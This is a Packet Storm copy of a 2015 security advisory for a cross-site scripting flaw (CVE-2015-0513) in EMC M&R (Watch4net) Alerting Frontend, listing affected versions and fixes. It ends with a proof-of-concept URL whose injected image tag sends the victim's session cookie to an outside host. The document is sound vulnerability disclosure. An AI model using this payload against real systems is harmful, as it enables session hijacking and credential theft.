Lucene search

K
packetstormHan SahinPACKETSTORM:130919
HistoryMar 20, 2015 - 12:00 a.m.

EMC M&R (Watch4net) Alerting Frontend XSS

2015-03-2000:00:00
Han Sahin
packetstormsecurity.com
23

0.001 Low

EPSS

Percentile

33.9%

`------------------------------------------------------------------------  
Cross-Site Scripting vulnerability in EMC M&R (Watch4net) Alerting  
Frontend  
------------------------------------------------------------------------  
Han Sahin, November 2014  
  
------------------------------------------------------------------------  
Abstract  
------------------------------------------------------------------------  
A Cross-Site Scripting vulnerability was found in EMC M&R (Watch4net)  
Alerting Frontend. This issue allows attackers to perform a wide  
variety of actions, such as stealing victims' session tokens or login  
credentials, performing arbitrary actions on their behalf, logging their  
keystrokes, or exploit issues in other areas of Watch4net.  
  
------------------------------------------------------------------------  
Affected products  
------------------------------------------------------------------------  
EMC reports that the following products are affected by this  
vulnerability:  
  
- EMC M&R (Watch4Net) versions prior 6.5u1  
- EMC ViPR SRM versions prior to 3.6.1  
  
------------------------------------------------------------------------  
See also  
------------------------------------------------------------------------  
- CVE-2015-0513  
- ESA-2015-004: EMC M&R (Watch4Net) Multiple Vulnerabilities  
  
------------------------------------------------------------------------  
Fix  
------------------------------------------------------------------------  
EMC released the following updated versions that resolve this  
vulnerability:  
  
- EMC M&R (Watch4Net) 6.5u1  
- EMC ViPR SRM 3.6.1  
  
Registered customers can download upgraded software from support.emc.com  
at https://support.emc.com/downloads/34247_ViPR-SRM.  
  
------------------------------------------------------------------------  
Details  
------------------------------------------------------------------------  
https://www.securify.nl/advisory/SFY20141104/cross_site_scripting_vulnerability_in_emc_m_r__watch4net__alerting_frontend.html  
  
This vulnerability can be exploited using the manager URL parameter. Tricking a victim into visiting a specially crafted URL allows attackers to run arbitrary client-side scripting code within the victim's browser. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.  
  
The following proof of concept demonstrates that it is possible to inject arbitrary JavaScript into the application's response in order to hijack the victim's session cookies:  
  
http://<target>:58080/alerting-frontend/adapters/get?manager=Local%20Manager%3Cimg+src%3dx+onerror%3dthis.src%3d%27https%3a//www.securify.nl/%3fc%3d%27%2bdocument.cookie%3E&_=1411480546258  
`

0.001 Low

EPSS

Percentile

33.9%